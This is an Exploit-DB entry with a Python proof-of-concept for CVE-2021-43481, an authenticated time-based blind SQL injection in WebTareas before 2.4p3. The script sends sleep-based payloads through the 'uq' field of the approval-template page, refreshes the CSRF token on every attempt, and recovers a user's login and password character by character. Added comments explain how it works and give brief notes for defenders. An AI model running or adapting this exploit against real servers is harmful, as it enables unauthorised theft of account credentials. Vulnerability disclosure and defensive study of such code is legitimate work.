WebTareas 2.4 - Blind SQLi (Authenticated)

EDB-ID:

50893




Platform:

PHP

Date:

2022-05-11


# Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)
# Date: 04/20/2022
# Exploit Author: Behrad Taher
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Version: < 2.4p3
# CVE : CVE-2021-43481

#The script takes 3 arguments: IP, user ID, session ID
#Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i

import requests, time, sys
from bs4 import BeautifulSoup
# Positional command-line arguments (see the usage line in the header).
# No validation is done: a missing argument raises IndexError at import time.
ip = sys.argv[1]   # inserted verbatim into the "http://%s/..." target URL
id = sys.argv[2]   # NOTE: shadows the builtin ``id``; only echoed in sqli()'s
                   # progress message, the query itself hard-codes ``id=1``
sid = sys.argv[3]  # value sent as the ``webTareasSID`` cookie, i.e. an
                   # already-authenticated session is required

def sqli(column: str) -> None:
    """Recover one column of the ``gW8members`` row with ``id=1``, one character at a time.

    The probe is a time-based blind SQL injection through the ``uq`` POST
    field of ``approvals/editapprovaltemplate.php`` (CVE-2021-43481; the
    header lists versions before 2.4p3 as affected). A candidate byte is
    taken as correct when the server's response takes more than 5 seconds.
    Progress is printed as characters are recovered; nothing is returned.

    Args:
        column: name of the column to read; the script calls this with
            ``"login"`` and ``"password"``.

    Defender notes:
        * Every position costs up to 95 GET/POST pairs to the same URL, so one
          run leaves hundreds of requests whose ``uq`` value contains
          ``sleep(`` in the web-server access log, plus repeated 5-second
          stalls in the database's slow-query log — both easy to alert on.
        * Because the session cookie is required, the activity is attributable
          to a specific authenticated account.
        * The remediation is to stop interpolating ``uq`` into SQL
          (use bound parameters) and to upgrade past the affected version.
    """
    # The module-level ``id`` argument is only used in this message; the
    # query below always targets the row with id=1.
    print("Extracting %s from user with ID: %s\n" % (column,id))
    extract = ""
    # Character positions 1..32: recovery silently stops at 32 characters.
    for i in range (1,33):
        # Stop once the previous position produced no match; this handles
        # values shorter than 32 characters (login and password alike).
        if(len(extract) < i-1):
            break
        # Printable ASCII candidates only (32..126).
        for j in range(32,127):
            # MySQL sleeps 5 s when the guessed byte matches, otherwise the
            # statement returns at once; elapsed time is the only signal.
            injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);" % (column,i,j)
            # ``?id=1`` here is the approval-template id, unrelated to the user row.
            url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip
            GET_cookies = {"webTareasSID": "%s" % sid}
            r = requests.get(url, cookies=GET_cookies)
            # The app has CSRF protection enabled, so a fresh GET is needed on
            # every attempt to read the current csrfToken from the form.
            # If the session is invalid the form is absent, ``find`` returns
            # None and the ``['value']`` lookup raises TypeError.
            token = BeautifulSoup(r.text,features="html.parser").find('input', {'name':'csrfToken'})['value']
            # This is an authenticated vulnerability: the same session cookie
            # must accompany the POST.
            POST_cookies = {"webTareasSID": "%s" % sid}
            POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection}
            # Wall-clock round-trip of the POST only; the GET above is not timed.
            start = time.time()
            requests.post(url, cookies=POST_cookies, data=POST_data)
            end = time.time() - start
            # A round-trip above 5 s is taken as a hit. Network latency or a slow
            # server can push an unrelated request over this threshold, which
            # would record a wrong character (presumably why results are echoed).
            if end > 5:
                extract += chr(j)
                # ANSI "cursor up" twice so the growing value overwrites the
                # previously printed line instead of scrolling.
                print ("\033[A\033[A")
                print(extract)
                break
# Entry point: recover the two columns of interest one after the other.
# Both calls read the same row (id=1) and share the session given on the CLI.
sqli("login")
sqli("password")